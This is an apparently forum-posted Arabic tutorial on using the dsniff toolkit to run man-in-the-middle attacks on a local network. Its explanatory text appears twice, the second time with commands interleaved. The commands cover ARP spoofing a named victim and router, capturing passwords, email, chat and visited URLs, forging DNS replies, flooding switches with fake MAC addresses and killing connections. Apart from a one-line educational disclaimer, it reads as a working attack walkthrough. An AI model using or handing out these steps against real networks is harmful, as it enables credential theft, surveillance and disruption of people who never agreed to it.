تويت
قبل شرح ما هو Dsniff سأشرح القليل ما هو هجوم MITM (man-in-the-middle) ما يسمى الوسيط ألا وهي القدرة على قرائة أو التعديلات أو إضافة أو إزالة البيانات المرسلة بين طرفين بدون علم أي أحد منهما وهذا يوجب على المهاجم عمل وسيط بين تلك البيانات بهجوم لتمر به تلك المعلومات وهذا الهجوم يصعب التحكم به لكن يعلم الكثير في عمل شبكة أكثر متانة.
Dsniff هي مجموعة من التطبيقات التي يمكنها التحكم بين طرفين لعمل وسيط لتمكن من عمل هجوم MITM ومن تلك التطبيقات يوجد ما يمكنه إعتراض كلمات المرور الخاصة ب http,ftp,telnet,smtp,pop … وأخرى يمكنها عمل تغيير في dns و أخرى يمكن التحكم في ما يتصفحه طرف من الطرفين وأخرى يمكن معرفة ما يرسل في msn
قبل البدئ رجاءا إقرأ هذا: هذا الشرح عمل خصيصا لعمل أرضية لشرحات أخرى ولا يحق لأحد إستعماله إلى لتعلم وكسب الخبرة وأي إستعمال غير أخلاقي ابرئ نفسي من كل معصية لله سبحانه وتعالى تكون عبر إستعمال هذا الشرح.
من أجل التعلم نكمل الشرح وقبل البدأ هذا البرنام يوجب مستخدم root للعمل
نقوم بتنصيبه.
لمعرفة كل التطبيقات التي يمكن إستعمالها
نعمل مثال
الروتر له ip 192.168.2.1
الحاسوب المراد الهجوم عليه 192.168.2.106
والمهاجم 192.168.2.10
ما نريده هو التحكم في البيانات المرسلة بين 192.168.2.106 و 192.168.2.1
وبعد المثل نقوم بتفعيل ip_forwarding بإضافة 1 إلى ملف /proc/sys/net/ipv4/ip_forward
لمذا نفعل ذالك الملف؟ لكي لا يوقف بسبب الهجوم أنترنيت الضحية
قبل البدأ في توسط البينات علينا عمل هجوم بحزم ARP مزيفة تقوم على إعادة توجيه البيانات المرسلة من الضحية إلى الروتر ومن الروتر إلى الضحية
eth0 يمكن أن تكون أخرى إستعمل ifconfig لمعرفة منفذ الإتصال بالشبكة
2> /dev/null & لإستعمال نفس سطر الأوامر
لتأكد من عمل ذالك الهجوم
لإيقاف الهجوم
في حاسوب الضحية إذا وضعنا
سنجد أن عنوان MAC الروتر هو نفسه الحاسوب المهاجم 192.168.2.10
dsniff لكلمات المرور يمكنه إيقاف كلمات المرور ل FTP, Telnet, HTTP, POP, NNTP, IMAP, SNMP, LDAP, Rlogin, NFS, SOCKS, X11, IRC, AIM, CVS, ICQ, Napster, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, y Oracle SQL*Net:
dnsspoof تزييف ردود dns لهجومات تخدع الضحية للوصول إلى ip المطلوبة
وهذا الملف على شكل
وهذا يجعل الضحية عند تصفح google يقوم بتغيير dns ليتصفح 127.0.0.1
وعمل هذا الهجوم يكون عبر أمر
filesnarf إلتقاط الملفات عبر NFS
macof غرق الشبكة عبر فيضان من عناوين عشوائية mac، يمكن ترك الشبكة المحلية متوقفة أو عديمة الفائدة
msgsnarf هذا يضهر ضعف بعض أنضمة الرسائل الفورية، AOL,ICQ 2000,IRC,MSN و YAHOO
sshmitm تحليل حركة المرور ssh الإصدار 1 و 2 ومحاولة المصادقة،طول كلمة المرور وطول الأوامر الخ …
tcpkill قتل إتصال مفعل وبتالي إجباره على إعادة بدء الإتصال مرة أخرى وبتالي حركة في نفس المكان قتل الإتصال ،
tcpnice بطئ الإتصال إلى حد توقيفه
اurlsnarf تسجيل أي حركة في url الضحية معرفة كل المواقع التي يتصل بها
webspy مشاهدة حركة موقع الضحية وفتحها على المتصفح الخاص بنا
webmitm عمل بروكسي شفاف وكل الإتصلات http و https تمر بنا وهكذا بإستعمال dnsspoof يمكن الإستلاء على كلمات المرور ومعلومات المرسلة عبر نماذج الوييب
mailsnarf التقاط كل مرور البريد الإلكتروني (Outlook, Thunderbird …)
تحياتي الخاصة والقادم أفضل.
Dsniff هي مجموعة من التطبيقات التي يمكنها التحكم بين طرفين لعمل وسيط لتمكن من عمل هجوم MITM ومن تلك التطبيقات يوجد ما يمكنه إعتراض كلمات المرور الخاصة ب http,ftp,telnet,smtp,pop … وأخرى يمكنها عمل تغيير في dns و أخرى يمكن التحكم في ما يتصفحه طرف من الطرفين وأخرى يمكن معرفة ما يرسل في msn
قبل البدئ رجاءا إقرأ هذا: هذا الشرح عمل خصيصا لعمل أرضية لشرحات أخرى ولا يحق لأحد إستعماله إلى لتعلم وكسب الخبرة وأي إستعمال غير أخلاقي ابرئ نفسي من كل معصية لله سبحانه وتعالى تكون عبر إستعمال هذا الشرح.
من أجل التعلم نكمل الشرح وقبل البدأ هذا البرنام يوجب مستخدم root للعمل
نقوم بتنصيبه.
كود PHP:
# apt-get install dsniff
كود PHP:
# dpkg -L dsniff | grep bin
الروتر له ip 192.168.2.1
الحاسوب المراد الهجوم عليه 192.168.2.106
والمهاجم 192.168.2.10
ما نريده هو التحكم في البيانات المرسلة بين 192.168.2.106 و 192.168.2.1
وبعد المثل نقوم بتفعيل ip_forwarding بإضافة 1 إلى ملف /proc/sys/net/ipv4/ip_forward
كود PHP:
# echo 1 > /proc/sys/net/ipv4/ip_forward
قبل البدأ في توسط البينات علينا عمل هجوم بحزم ARP مزيفة تقوم على إعادة توجيه البيانات المرسلة من الضحية إلى الروتر ومن الروتر إلى الضحية
كود PHP:
# arpspoof -i eth0 -t 192.168.2.1 192.168.2.106 2> /dev/null &
# arpspoof -i eth0 -t 192.168.2.106 192.168.2.1 2> /dev/null &
2> /dev/null & لإستعمال نفس سطر الأوامر
لتأكد من عمل ذالك الهجوم
كود PHP:
# tcpdump -i wlan0 -l -n tcp -A -s 128
كود PHP:
# killall arpspoof
كود PHP:
arp -a
dsniff لكلمات المرور يمكنه إيقاف كلمات المرور ل FTP, Telnet, HTTP, POP, NNTP, IMAP, SNMP, LDAP, Rlogin, NFS, SOCKS, X11, IRC, AIM, CVS, ICQ, Napster, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, y Oracle SQL*Net:
كود PHP:
# dsniff -i eth0
كود PHP:
# vim /usr/share/dsniff/dnsspoof.hosts
كود PHP:
127.0.0.1 *.google.*
وعمل هذا الهجوم يكون عبر أمر
كود PHP:
# dnsspoof -i eth0 -f dnsspoof.hosts
كود PHP:
# filesnarf -i eth0
كود PHP:
# macof -i eth0
كود PHP:
# msgsnarf -i eth0
tcpkill قتل إتصال مفعل وبتالي إجباره على إعادة بدء الإتصال مرة أخرى وبتالي حركة في نفس المكان قتل الإتصال ،
كود PHP:
# tcpkill -i eth0 port 21 or port 22
اurlsnarf تسجيل أي حركة في url الضحية معرفة كل المواقع التي يتصل بها
كود PHP:
# urlsnarf -i eth0
كود PHP:
# webspy -i eth0 192.168.2.106
mailsnarf التقاط كل مرور البريد الإلكتروني (Outlook, Thunderbird …)
كود PHP:
# mailsnarf -i eth0